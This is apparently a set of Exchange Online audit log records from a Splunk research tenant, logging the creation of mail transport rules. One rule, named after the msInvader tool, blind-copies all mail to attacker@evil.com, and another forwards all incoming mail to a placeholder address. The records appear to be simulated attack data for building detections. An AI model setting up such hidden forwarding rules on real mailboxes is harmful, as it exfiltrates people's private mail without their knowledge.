{"AppAccessContext": {"IssuedAtTime": "2024-04-05T02:04:16", "UniqueTokenId": "MlCqXpE8E0WXmJNhOtNuAA"}, "CreationTime": "2024-04-05T02:09:30", "Id": "cae78cca-32a7-4589-8ee8-08dc55156db3", "Operation": "New-TransportRule", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "120.1.121.43:15922", "ObjectId": "", "UserId": "user30@splunkresearch.onmicrosoft.com", "AppId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "ExternalAccess": false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB4290 (15.20.7409.037)", "Parameters": [{"Name": "Priority", "Value": "0"}, {"Name": "BlindCopyTo", "Value": "attacker@evil.com"}, {"Name": "Name", "Value": "msInvader mailfow rule"}], "RequestId": "6864046b-09f3-66e9-8e2a-0e184ff4f19b", "SessionId": "3aee2e0a-dbf2-49eb-982c-5ecc93a41c29"} {"AppAccessContext": {"IssuedAtTime": "2024-04-05T01:30:19", "UniqueTokenId": "HLa57yns-kqEilh5TkNzAA"}, "CreationTime": "2024-04-05T01:36:37", "Id": "8963a276-b8d2-4433-1e48-08dc5510d5c5", "Operation": "New-TransportRule", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "120.1.121.43:12811", "ObjectId": "", "UserId": "user30@splunkresearch.onmicrosoft.com", "AppId": "fb78d390-0c51-40cd-8e17-fdbfab77341b", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "ExternalAccess": false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB4290 (15.20.7409.037)", "Parameters": [{"Name": "Priority", "Value": "0"}, {"Name": "BlindCopyTo", "Value": "recipient@domain.com"}, {"Name": "Name", "Value": "Forward All Incoming Mail"}], "RequestId": "07e084dc-435f-bc1c-a2a7-60aa8a4d532f", "SessionId": "2dee3da7-2624-4a46-9468-abc374bef8c0"} {"AppAccessContext": {"IssuedAtTime": "2024-04-04T17:17:44", "UniqueTokenId": "L0S7eG9drUKI2GWqkZJZAA"}, "CreationTime": "2024-04-04T17:30:39", "Id": "fb11cf17-bdce-49f5-ba82-08dc54ccf21b", "Operation": "New-TransportRule", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "1.185.225.251:18727", "ObjectId": "", "UserId": "user30@splunkresearch.onmicrosoft.com", "AppId": "497effe9-df71-4043-a8bb-14cf78c4b63b", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "ExternalAccess": false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "DM4PR18MB5428 (15.20.7409.037)", "Parameters": [{"Name": "SenderAddressLocation", "Value": "Header"}, {"Name": "Enabled", "Value": "False"}, {"Name": "Name", "Value": "Copy of TestRule"}, {"Name": "StopRuleProcessing", "Value": "False"}, {"Name": "Priority", "Value": "3"}, {"Name": "Mode", "Value": "Enforce"}, {"Name": "RuleErrorAction", "Value": "Ignore"}, {"Name": "ModerateMessageByUser", "Value": "user30@splunkresearch.onmicrosoft.com"}, {"Name": "ActivationDate", "Value": "4/4/2024 5:30:12 PM"}], "RequestId": "b7eaf077-a574-ff82-70f4-69c55b9eee70", "SessionId": "3e62850e-1404-4c94-80b6-8f548b4f2a2a"} {"AppAccessContext": {"IssuedAtTime": "2024-04-04T17:17:44", "UniqueTokenId": "L0S7eG9drUKI2GWqkZJZAA"}, "CreationTime": "2024-04-04T17:29:15", "Id": "4177c199-bfa8-42d2-1d5e-08dc54ccc082", "Operation": "New-TransportRule", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType": 2, "Version": 1, "Workload": "Exchange", "ClientIP": "1.185.225.251:27782", "ObjectId": "", "UserId": "user30@splunkresearch.onmicrosoft.com", "AppId": "497effe9-df71-4043-a8bb-14cf78c4b63b", "AppPoolName": "MSExchangeAdminApiNetCore", "ClientAppId": "", "ExternalAccess": false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer": "DM4PR18MB5428 (15.20.7409.037)", "Parameters": [{"Name": "Comments", "Value": ""}, {"Name": "SetAuditSeverity", "Value": ""}, {"Name": "SenderAddressLocation", "Value": "Header"}, {"Name": "Enabled", "Value": "False"}, {"Name": "Name", "Value": "TestRule"}, {"Name": "StopRuleProcessing", "Value": "False"}, {"Name": "Priority", "Value": "2"}, {"Name": "Mode", "Value": "Enforce"}, {"Name": "RuleErrorAction", "Value": "Ignore"}, {"Name": "ModerateMessageByUser", "Value": "user30@splunkresearch.onmicrosoft.com"}], "RequestId": "f643b349-e494-2c05-f01a-f4555e23bc1c", "SessionId": "3e62850e-1404-4c94-80b6-8f548b4f2a2a"}